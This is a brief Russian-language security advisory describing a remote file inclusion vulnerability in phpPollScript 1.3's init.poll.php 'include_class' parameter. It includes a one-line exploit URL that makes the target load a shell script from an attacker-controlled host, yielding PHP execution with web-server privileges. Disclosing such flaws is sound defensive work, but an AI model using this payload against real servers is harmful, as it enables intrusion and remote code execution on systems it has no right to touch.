Программа: phpPollScript 1.3

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «include_class» сценарием init.poll.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.

Эксплоит:

http://target.com/[path]/php/init.poll.php?include_class=http://attacker.com/shell.txt/test



Оставить мнение